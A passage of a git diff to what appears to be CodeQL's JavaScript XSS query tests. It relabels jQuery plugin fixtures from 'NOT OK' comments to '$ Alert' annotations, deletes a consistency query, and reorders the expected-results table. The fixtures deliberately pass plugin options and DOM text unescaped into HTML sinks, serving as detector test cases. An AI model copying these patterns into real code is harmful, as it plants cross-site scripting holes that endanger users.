    ', target: '.my_plugin' }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source options = $.extend({}, $.fn.my_plugin.defaults, options); - $(options.menu); // OK - $(options.target); // NOT OK + $(options.menu); + $(options.target); // $ Alert }; var pluginName = "my_plugin"; - $.fn[pluginName] = function my_plugin(options) { - $(options.target); // NOT OK + $.fn[pluginName] = function my_plugin(options) { // $ Source + $(options.target); // $ Alert }; $.extend($.fn, { - my_plugin: function my_plugin(options) { - $(options.target); // NOT OK + my_plugin: function my_plugin(options) { // $ Source + $(options.target); // $ Alert } }); - $.fn.affix = function my_plugin(options) { - $(options.target); // NOT OK + $.fn.affix = function my_plugin(options) { // $ Source + $(options.target); // $ Alert }; - $.fn.tooltip = function my_plugin(options) { - $(options.viewport.selector); // NOT OK + $.fn.tooltip = function my_plugin(options) { // $ Source + $(options.viewport.selector); // $ Alert }; $.fn.my_plugin = function my_plugin(options) { let intentional1 = options.target || `
    hello
    `; - $(intentional1); // OK + $(intentional1); let intentional2 = `
    ${options.target}
    `; - $(intentional2); // OK + $(intentional2); let intentional3 = `
    ` + options.target `
    `; - $(intentional3); // OK + $(intentional3); let unintentional = `
    `; $(unintentional); // OK - but should be flagged by another query } - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source let target = options.target; - target === DEFAULTS.target? $(target): $(document).find(target); // OK - options.target === DEFAULTS.target? $(options.target): $(document).find(options.target); // OK - options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // OK - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties [INCONSISTENCY] + target === DEFAULTS.target? $(target): $(document).find(target); + options.target === DEFAULTS.target? $(options.target): $(document).find(options.target); + options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // $ SPURIOUS: Alert - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties } - $.fn.my_plugin = function my_plugin(options) { - $(anyPrefix + options.target); // OK (unlikely to be a html/css prefix confusion) + $.fn.my_plugin = function my_plugin(options) { // $ Source + $(anyPrefix + options.target); // OK - unlikely to be a html/css prefix confusion - $(something.replace("%PLACEHOLDER%", options.target)); // OK (unlikely to be a html/css prefix confusion); + $(something.replace("%PLACEHOLDER%", options.target)); // OK - (unlikely to be a html/css prefix confusion); let target = options.target; if (target.foo) { - $(target); // OK (unlikely to be a string) + $(target); // OK - unlikely to be a string } if (target.length) { - $(target); // NOT OK (can still be a string) + $(target); // $ Alert - can still be a string } } @@ -175,28 +175,28 @@ function setupPlugin(o) { $.fn.my_plugin = o.f } - setupPlugin({f: function(options) { - $(options.target); // NOT OK + setupPlugin({f: function(options) { // $ Source + $(options.target); // $ Alert }}); setupPlugin({f:function(options) { - $(document).find(options.target); // OK + $(document).find(options.target); }}); - $.fn.position = function( options ) { + $.fn.position = function( options ) { // $ Source if ( !options || !options.of ) { return doSomethingElse( this, arguments ); } // extending options options = $.extend( {}, options ); - var target = $( options.of ); // NOT OK + var target = $( options.of ); // $ Alert console.log(target); }; $.fn.blockReceiver = function( options ) { $.extend({ foo() { - $(this); // OK + $(this); } }, options, diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.expected b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql deleted file mode 100644 index 547763a8f838..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql +++ /dev/null @@ -1,14 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.XssThroughDomQuery - -deprecated class ConsistencyConfig extends ConsistencyConfiguration { - ConsistencyConfig() { this = "ConsistencyConfig" } - - override DataFlow::Node getAnAlert() { - exists(DataFlow::Node source | - XssThroughDomFlow::flow(source, result) and - not isIgnoredSourceSinkPair(source, result) - ) - } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/XssThroughDom.expected b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/XssThroughDom.expected index 1b53311a3d69..6f2eed5b1393 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/XssThroughDom.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/XssThroughDom.expected @@ -1,3 +1,52 @@ +#select +| angular.ts:16:24:16:41 | event.target.value | angular.ts:16:24:16:41 | event.target.value | angular.ts:16:24:16:41 | event.target.value | $@ is reinterpreted as HTML without escaping meta-characters. | angular.ts:16:24:16:41 | event.target.value | DOM text | +| angular.ts:20:24:20:35 | target.value | angular.ts:20:24:20:35 | target.value | angular.ts:20:24:20:35 | target.value | $@ is reinterpreted as HTML without escaping meta-characters. | angular.ts:20:24:20:35 | target.value | DOM text | +| angular.ts:29:24:29:37 | form.value.foo | angular.ts:29:24:29:33 | form.value | angular.ts:29:24:29:37 | form.value.foo | $@ is reinterpreted as HTML without escaping meta-characters. | angular.ts:29:24:29:33 | form.value | DOM text | +| angular.ts:33:24:33:33 | this.field | angular.ts:12:5:12:23 | field: string = ""; | angular.ts:33:24:33:33 | this.field | $@ is reinterpreted as HTML without escaping meta-characters. | angular.ts:12:5:12:23 | field: string = ""; | DOM text | +| forms.js:9:31:9:40 | values.foo | forms.js:8:23:8:28 | values | forms.js:9:31:9:40 | values.foo | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:8:23:8:28 | values | DOM text | +| forms.js:12:31:12:40 | values.bar | forms.js:11:24:11:29 | values | forms.js:12:31:12:40 | values.bar | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:11:24:11:29 | values | DOM text | +| forms.js:25:23:25:34 | values.email | forms.js:24:15:24:20 | values | forms.js:25:23:25:34 | values.email | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:24:15:24:20 | values | DOM text | +| forms.js:29:23:29:34 | values.email | forms.js:28:20:28:25 | values | forms.js:29:23:29:34 | values.email | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:28:20:28:25 | values | DOM text | +| forms.js:35:19:35:30 | values.email | forms.js:34:13:34:18 | values | forms.js:35:19:35:30 | values.email | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:34:13:34:18 | values | DOM text | +| forms.js:45:21:45:33 | values.stooge | forms.js:44:21:44:26 | values | forms.js:45:21:45:33 | values.stooge | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:44:21:44:26 | values | DOM text | +| forms.js:57:19:57:32 | e.target.value | forms.js:57:19:57:32 | e.target.value | forms.js:57:19:57:32 | e.target.value | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:57:19:57:32 | e.target.value | DOM text | +| forms.js:72:19:72:27 | data.name | forms.js:71:21:71:24 | data | forms.js:72:19:72:27 | data.name | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:71:21:71:24 | data | DOM text | +| forms.js:93:25:93:35 | values.name | forms.js:92:26:92:36 | getValues() | forms.js:93:25:93:35 | values.name | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:92:26:92:36 | getValues() | DOM text | +| forms.js:103:23:103:36 | e.target.value | forms.js:103:23:103:36 | e.target.value | forms.js:103:23:103:36 | e.target.value | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:103:23:103:36 | e.target.value | DOM text | +| forms.js:107:23:107:36 | e.target.value | forms.js:107:23:107:36 | e.target.value | forms.js:107:23:107:36 | e.target.value | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:107:23:107:36 | e.target.value | DOM text | +| xss-through-dom.js:2:16:2:34 | $("textarea").val() | xss-through-dom.js:2:16:2:34 | $("textarea").val() | xss-through-dom.js:2:16:2:34 | $("textarea").val() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:2:16:2:34 | $("textarea").val() | DOM text | +| xss-through-dom.js:4:16:4:40 | $(".som ... .text() | xss-through-dom.js:4:16:4:40 | $(".som ... .text() | xss-through-dom.js:4:16:4:40 | $(".som ... .text() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:4:16:4:40 | $(".som ... .text() | DOM text | +| xss-through-dom.js:8:16:8:53 | $(".som ... arget") | xss-through-dom.js:8:16:8:53 | $(".som ... arget") | xss-through-dom.js:8:16:8:53 | $(".som ... arget") | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:8:16:8:53 | $(".som ... arget") | DOM text | +| xss-through-dom.js:11:3:11:42 | documen ... nerText | xss-through-dom.js:11:3:11:42 | documen ... nerText | xss-through-dom.js:11:3:11:42 | documen ... nerText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:11:3:11:42 | documen ... nerText | DOM text | +| xss-through-dom.js:19:3:19:44 | documen ... Content | xss-through-dom.js:19:3:19:44 | documen ... Content | xss-through-dom.js:19:3:19:44 | documen ... Content | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:19:3:19:44 | documen ... Content | DOM text | +| xss-through-dom.js:23:3:23:48 | documen ... ].value | xss-through-dom.js:23:3:23:48 | documen ... ].value | xss-through-dom.js:23:3:23:48 | documen ... ].value | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:23:3:23:48 | documen ... ].value | DOM text | +| xss-through-dom.js:27:3:27:61 | documen ... arget') | xss-through-dom.js:27:3:27:61 | documen ... arget') | xss-through-dom.js:27:3:27:61 | documen ... arget') | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:27:3:27:61 | documen ... arget') | DOM text | +| xss-through-dom.js:51:30:51:48 | $("textarea").val() | xss-through-dom.js:51:30:51:48 | $("textarea").val() | xss-through-dom.js:51:30:51:48 | $("textarea").val() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:51:30:51:48 | $("textarea").val() | DOM text | +| xss-through-dom.js:54:31:54:49 | $("textarea").val() | xss-through-dom.js:54:31:54:49 | $("textarea").val() | xss-through-dom.js:54:31:54:49 | $("textarea").val() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:54:31:54:49 | $("textarea").val() | DOM text | +| xss-through-dom.js:56:30:56:51 | $("inpu ... 0).name | xss-through-dom.js:56:30:56:51 | $("inpu ... 0).name | xss-through-dom.js:56:30:56:51 | $("inpu ... 0).name | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:56:30:56:51 | $("inpu ... 0).name | DOM text | +| xss-through-dom.js:57:30:57:67 | $("inpu ... "name") | xss-through-dom.js:57:30:57:67 | $("inpu ... "name") | xss-through-dom.js:57:30:57:67 | $("inpu ... "name") | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:57:30:57:67 | $("inpu ... "name") | DOM text | +| xss-through-dom.js:61:30:61:69 | $(docum ... value") | xss-through-dom.js:61:30:61:69 | $(docum ... value") | xss-through-dom.js:61:30:61:69 | $(docum ... value") | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:61:30:61:69 | $(docum ... value") | DOM text | +| xss-through-dom.js:64:30:64:40 | valMethod() | xss-through-dom.js:64:30:64:40 | valMethod() | xss-through-dom.js:64:30:64:40 | valMethod() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:64:30:64:40 | valMethod() | DOM text | +| xss-through-dom.js:71:11:71:32 | $("inpu ... 0).name | xss-through-dom.js:71:11:71:32 | $("inpu ... 0).name | xss-through-dom.js:71:11:71:32 | $("inpu ... 0).name | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:71:11:71:32 | $("inpu ... 0).name | DOM text | +| xss-through-dom.js:77:4:77:11 | selector | xss-through-dom.js:73:20:73:41 | $("inpu ... 0).name | xss-through-dom.js:77:4:77:11 | selector | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:73:20:73:41 | $("inpu ... 0).name | DOM text | +| xss-through-dom.js:79:4:79:34 | documen ... t.value | xss-through-dom.js:79:4:79:34 | documen ... t.value | xss-through-dom.js:79:4:79:34 | documen ... t.value | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:79:4:79:34 | documen ... t.value | DOM text | +| xss-through-dom.js:81:17:81:43 | $('#foo ... rText') | xss-through-dom.js:81:17:81:43 | $('#foo ... rText') | xss-through-dom.js:81:17:81:43 | $('#foo ... rText') | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:81:17:81:43 | $('#foo ... rText') | DOM text | +| xss-through-dom.js:86:16:86:37 | anser.a ... l(text) | xss-through-dom.js:84:15:84:30 | $("text").text() | xss-through-dom.js:86:16:86:37 | anser.a ... l(text) | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:84:15:84:30 | $("text").text() | DOM text | +| xss-through-dom.js:87:16:87:40 | new ans ... s(text) | xss-through-dom.js:84:15:84:30 | $("text").text() | xss-through-dom.js:87:16:87:40 | new ans ... s(text) | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:84:15:84:30 | $("text").text() | DOM text | +| xss-through-dom.js:93:16:93:46 | $("#foo ... ].value | xss-through-dom.js:93:16:93:46 | $("#foo ... ].value | xss-through-dom.js:93:16:93:46 | $("#foo ... ].value | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:93:16:93:46 | $("#foo ... ].value | DOM text | +| xss-through-dom.js:96:17:96:47 | $("#foo ... ].value | xss-through-dom.js:96:17:96:47 | $("#foo ... ].value | xss-through-dom.js:96:17:96:47 | $("#foo ... ].value | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:96:17:96:47 | $("#foo ... ].value | DOM text | +| xss-through-dom.js:109:31:109:70 | "" | xss-through-dom.js:109:45:109:55 | this.el.src | xss-through-dom.js:109:31:109:70 | "" | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:109:45:109:55 | this.el.src | DOM text | +| xss-through-dom.js:115:16:115:18 | src | xss-through-dom.js:114:17:114:52 | documen ... k").src | xss-through-dom.js:115:16:115:18 | src | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:114:17:114:52 | documen ... k").src | DOM text | +| xss-through-dom.js:120:23:120:45 | ev.targ ... 0].name | xss-through-dom.js:120:23:120:37 | ev.target.files | xss-through-dom.js:120:23:120:45 | ev.targ ... 0].name | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:120:23:120:37 | ev.target.files | DOM text | +| xss-through-dom.js:122:33:122:71 | URL.cre ... les[0]) | xss-through-dom.js:122:53:122:67 | ev.target.files | xss-through-dom.js:122:33:122:71 | URL.cre ... les[0]) | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:122:53:122:67 | ev.target.files | DOM text | +| xss-through-dom.js:131:19:131:26 | linkText | xss-through-dom.js:130:17:130:37 | wSelect ... tring() | xss-through-dom.js:131:19:131:26 | linkText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:130:17:130:37 | wSelect ... tring() | DOM text | +| xss-through-dom.js:131:19:131:26 | linkText | xss-through-dom.js:130:42:130:62 | dSelect ... tring() | xss-through-dom.js:131:19:131:26 | linkText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:130:42:130:62 | dSelect ... tring() | DOM text | +| xss-through-dom.js:132:16:132:23 | linkText | xss-through-dom.js:130:17:130:37 | wSelect ... tring() | xss-through-dom.js:132:16:132:23 | linkText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:130:17:130:37 | wSelect ... tring() | DOM text | +| xss-through-dom.js:132:16:132:23 | linkText | xss-through-dom.js:130:42:130:62 | dSelect ... tring() | xss-through-dom.js:132:16:132:23 | linkText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:130:42:130:62 | dSelect ... tring() | DOM text | +| xss-through-dom.js:140:19:140:21 | src | xss-through-dom.js:139:17:139:52 | documen ... k").src | xss-through-dom.js:140:19:140:21 | src | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:139:17:139:52 | documen ... k").src | DOM text | +| xss-through-dom.js:141:25:141:27 | src | xss-through-dom.js:139:17:139:52 | documen ... k").src | xss-through-dom.js:141:25:141:27 | src | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:139:17:139:52 | documen ... k").src | DOM text | +| xss-through-dom.js:150:24:150:26 | src | xss-through-dom.js:139:17:139:52 | documen ... k").src | xss-through-dom.js:150:24:150:26 | src | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:139:17:139:52 | documen ... k").src | DOM text | +| xss-through-dom.js:155:27:155:29 | msg | xss-through-dom.js:159:34:159:52 | $("textarea").val() | xss-through-dom.js:155:27:155:29 | msg | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:159:34:159:52 | $("textarea").val() | DOM text | edges | angular.ts:12:5:12:23 | field: string = ""; | angular.ts:33:24:33:33 | this.field | provenance | | | angular.ts:29:24:29:33 | form.value | angular.ts:29:24:29:37 | form.value.foo | provenance | | @@ -131,52 +180,3 @@ nodes | xss-through-dom.js:155:27:155:29 | msg | semmle.label | msg | | xss-through-dom.js:159:34:159:52 | $("textarea").val() | semmle.label | $("textarea").val() | subpaths -#select -| angular.ts:16:24:16:41 | event.target.value | angular.ts:16:24:16:41 | event.target.value | angular.ts:16:24:16:41 | event.target.value | $@ is reinterpreted as HTML without escaping meta-characters. | angular.ts:16:24:16:41 | event.target.value | DOM text | -| angular.ts:20:24:20:35 | target.value | angular.ts:20:24:20:35 | target.value | angular.ts:20:24:20:35 | target.value | $@ is reinterpreted as HTML without escaping meta-characters. | angular.ts:20:24:20:35 | target.value | DOM text | -| angular.ts:29:24:29:37 | form.value.foo | angular.ts:29:24:29:33 | form.value | angular.ts:29:24:29:37 | form.value.foo | $@ is reinterpreted as HTML without escaping meta-characters. | angular.ts:29:24:29:33 | form.value | DOM text | -| angular.ts:33:24:33:33 | this.field | angular.ts:12:5:12:23 | field: string = ""; | angular.ts:33:24:33:33 | this.field | $@ is reinterpreted as HTML without escaping meta-characters. | angular.ts:12:5:12:23 | field: string = ""; | DOM text | -| forms.js:9:31:9:40 | values.foo | forms.js:8:23:8:28 | values | forms.js:9:31:9:40 | values.foo | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:8:23:8:28 | values | DOM text | -| forms.js:12:31:12:40 | values.bar | forms.js:11:24:11:29 | values | forms.js:12:31:12:40 | values.bar | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:11:24:11:29 | values | DOM text | -| forms.js:25:23:25:34 | values.email | forms.js:24:15:24:20 | values | forms.js:25:23:25:34 | values.email | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:24:15:24:20 | values | DOM text | -| forms.js:29:23:29:34 | values.email | forms.js:28:20:28:25 | values | forms.js:29:23:29:34 | values.email | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:28:20:28:25 | values | DOM text | -| forms.js:35:19:35:30 | values.email | forms.js:34:13:34:18 | values | forms.js:35:19:35:30 | values.email | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:34:13:34:18 | values | DOM text | -| forms.js:45:21:45:33 | values.stooge | forms.js:44:21:44:26 | values | forms.js:45:21:45:33 | values.stooge | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:44:21:44:26 | values | DOM text | -| forms.js:57:19:57:32 | e.target.value | forms.js:57:19:57:32 | e.target.value | forms.js:57:19:57:32 | e.target.value | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:57:19:57:32 | e.target.value | DOM text | -| forms.js:72:19:72:27 | data.name | forms.js:71:21:71:24 | data | forms.js:72:19:72:27 | data.name | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:71:21:71:24 | data | DOM text | -| forms.js:93:25:93:35 | values.name | forms.js:92:26:92:36 | getValues() | forms.js:93:25:93:35 | values.name | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:92:26:92:36 | getValues() | DOM text | -| forms.js:103:23:103:36 | e.target.value | forms.js:103:23:103:36 | e.target.value | forms.js:103:23:103:36 | e.target.value | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:103:23:103:36 | e.target.value | DOM text | -| forms.js:107:23:107:36 | e.target.value | forms.js:107:23:107:36 | e.target.value | forms.js:107:23:107:36 | e.target.value | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:107:23:107:36 | e.target.value | DOM text | -| xss-through-dom.js:2:16:2:34 | $("textarea").val() | xss-through-dom.js:2:16:2:34 | $("textarea").val() | xss-through-dom.js:2:16:2:34 | $("textarea").val() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:2:16:2:34 | $("textarea").val() | DOM text | -| xss-through-dom.js:4:16:4:40 | $(".som ... .text() | xss-through-dom.js:4:16:4:40 | $(".som ... .text() | xss-through-dom.js:4:16:4:40 | $(".som ... .text() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:4:16:4:40 | $(".som ... .text() | DOM text | -| xss-through-dom.js:8:16:8:53 | $(".som ... arget") | xss-through-dom.js:8:16:8:53 | $(".som ... arget") | xss-through-dom.js:8:16:8:53 | $(".som ... arget") | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:8:16:8:53 | $(".som ... arget") | DOM text | -| xss-through-dom.js:11:3:11:42 | documen ... nerText | xss-through-dom.js:11:3:11:42 | documen ... nerText | xss-through-dom.js:11:3:11:42 | documen ... nerText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:11:3:11:42 | documen ... nerText | DOM text | -| xss-through-dom.js:19:3:19:44 | documen ... Content | xss-through-dom.js:19:3:19:44 | documen ... Content | xss-through-dom.js:19:3:19:44 | documen ... Content | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:19:3:19:44 | documen ... Content | DOM text | -| xss-through-dom.js:23:3:23:48 | documen ... ].value | xss-through-dom.js:23:3:23:48 | documen ... ].value | xss-through-dom.js:23:3:23:48 | documen ... ].value | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:23:3:23:48 | documen ... ].value | DOM text | -| xss-through-dom.js:27:3:27:61 | documen ... arget') | xss-through-dom.js:27:3:27:61 | documen ... arget') | xss-through-dom.js:27:3:27:61 | documen ... arget') | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:27:3:27:61 | documen ... arget') | DOM text | -| xss-through-dom.js:51:30:51:48 | $("textarea").val() | xss-through-dom.js:51:30:51:48 | $("textarea").val() | xss-through-dom.js:51:30:51:48 | $("textarea").val() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:51:30:51:48 | $("textarea").val() | DOM text | -| xss-through-dom.js:54:31:54:49 | $("textarea").val() | xss-through-dom.js:54:31:54:49 | $("textarea").val() | xss-through-dom.js:54:31:54:49 | $("textarea").val() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:54:31:54:49 | $("textarea").val() | DOM text | -| xss-through-dom.js:56:30:56:51 | $("inpu ... 0).name | xss-through-dom.js:56:30:56:51 | $("inpu ... 0).name | xss-through-dom.js:56:30:56:51 | $("inpu ... 0).name | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:56:30:56:51 | $("inpu ... 0).name | DOM text | -| xss-through-dom.js:57:30:57:67 | $("inpu ... "name") | xss-through-dom.js:57:30:57:67 | $("inpu ... "name") | xss-through-dom.js:57:30:57:67 | $("inpu ... "name") | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:57:30:57:67 | $("inpu ... "name") | DOM text | -| xss-through-dom.js:61:30:61:69 | $(docum ... value") | xss-through-dom.js:61:30:61:69 | $(docum ... value") | xss-through-dom.js:61:30:61:69 | $(docum ... value") | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:61:30:61:69 | $(docum ... value") | DOM text | -| xss-through-dom.js:64:30:64:40 | valMethod() | xss-through-dom.js:64:30:64:40 | valMethod() | xss-through-dom.js:64:30:64:40 | valMethod() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:64:30:64:40 | valMethod() | DOM text | -| xss-through-dom.js:71:11:71:32 | $("inpu ... 0).name | xss-through-dom.js:71:11:71:32 | $("inpu ... 0).name | xss-through-dom.js:71:11:71:32 | $("inpu ... 0).name | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:71:11:71:32 | $("inpu ... 0).name | DOM text | -| xss-through-dom.js:77:4:77:11 | selector | xss-through-dom.js:73:20:73:41 | $("inpu ... 0).name | xss-through-dom.js:77:4:77:11 | selector | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:73:20:73:41 | $("inpu ... 0).name | DOM text | -| xss-through-dom.js:79:4:79:34 | documen ... t.value | xss-through-dom.js:79:4:79:34 | documen ... t.value | xss-through-dom.js:79:4:79:34 | documen ... t.value | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:79:4:79:34 | documen ... t.value | DOM text | -| xss-through-dom.js:81:17:81:43 | $('#foo ... rText') | xss-through-dom.js:81:17:81:43 | $('#foo ... rText') | xss-through-dom.js:81:17:81:43 | $('#foo ... rText') | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:81:17:81:43 | $('#foo ... rText') | DOM text | -| xss-through-dom.js:86:16:86:37 | anser.a ... l(text) | xss-through-dom.js:84:15:84:30 | $("text").text() | xss-through-dom.js:86:16:86:37 | anser.a ... l(text) | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:84:15:84:30 | $("text").text() | DOM text | -| xss-through-dom.js:87:16:87:40 | new ans ... s(text) | xss-through-dom.js:84:15:84:30 | $("text").text() | xss-through-dom.js:87:16:87:40 | new ans ... s(text) | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:84:15:84:30 | $("text").text() | DOM text | -| xss-through-dom.js:93:16:93:46 | $("#foo ... ].value | xss-through-dom.js:93:16:93:46 | $("#foo ... ].value | xss-through-dom.js:93:16:93:46 | $("#foo ... ].value | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:93:16:93:46 | $("#foo ... ].value | DOM text | -| xss-through-dom.js:96:17:96:47 | $("#foo ... ].value | xss-through-dom.js:96:17:96:47 | $("#foo ... ].value | xss-through-dom.js:96:17:96:47 | $("#foo ... ].value | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:96:17:96:47 | $("#foo ... ].value | DOM text | -| xss-through-dom.js:109:31:109:70 | "" | xss-through-dom.js:109:45:109:55 | this.el.src | xss-through-dom.js:109:31:109:70 | "" | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:109:45:109:55 | this.el.src | DOM text | -| xss-through-dom.js:115:16:115:18 | src | xss-through-dom.js:114:17:114:52 | documen ... k").src | xss-through-dom.js:115:16:115:18 | src | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:114:17:114:52 | documen ... k").src | DOM text | -| xss-through-dom.js:120:23:120:45 | ev.targ ... 0].name | xss-through-dom.js:120:23:120:37 | ev.target.files | xss-through-dom.js:120:23:120:45 | ev.targ ... 0].name | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:120:23:120:37 | ev.target.files | DOM text | -| xss-through-dom.js:122:33:122:71 | URL.cre ... les[0]) | xss-through-dom.js:122:53:122:67 | ev.target.files | xss-through-dom.js:122:33:122:71 | URL.cre ... les[0]) | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:122:53:122:67 | ev.target.files | DOM text | -| xss-through-dom.js:131:19:131:26 | linkText | xss-through-dom.js:130:17:130:37 | wSelect ... tring() | xss-through-dom.js:131:19:131:26 | linkText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:130:17:130:37 | wSelect ... tring() | DOM text | -| xss-through-dom.js:131:19:131:26 | linkText | xss-through-dom.js:130:42:130:62 | dSelect ... tring() | xss-through-dom.js:131:19:131:26 | linkText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:130:42:130:62 | dSelect ... tring() | DOM text | -| xss-through-dom.js:132:16:132:23 | linkText | xss-through-dom.js:130:17:130:37 | wSelect ... tring() | xss-through-dom.js:132:16:132:23 | linkText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:130:17:130:37 | wSelect ... tring() | DOM text | -| xss-through-dom.js:132:16:132:23 | linkText | xss-through-dom.js:130:42:130:62 | dSelect ... tring() | xss-through-dom.js:132:16:132:23 | linkText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:130:42:130:62 | dSelect ... tring() | DOM text | -| xss-through-dom.js:140:19:140:21 | src | xss-through-dom.js:139:17:139:52 | documen ... k").src | xss-through-dom.js:140:19:140:21 | src | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:139:17:139:52 | documen ... k").src | DOM text | -| xss-through-dom.js:141:25:141:27 | src | xss-through-dom.js:139:17:139:52 | documen ... k").src | xss-through-dom.js:141:25:141:27 | src | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:139:17:139:52 | documen ... k").src | DOM text | -| xss-through-dom.js:150:24:150:26 | src | xss-through-dom.js:139:17:139:52 | documen ... k").src | xss-through-dom.js:150:24:150:26 | src | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:139:17:139:52 | documen ... k").src | DOM text | -| xss-through-dom.js:155:27:155:29 | msg | xss-through-dom.js:159:34:159:52 | 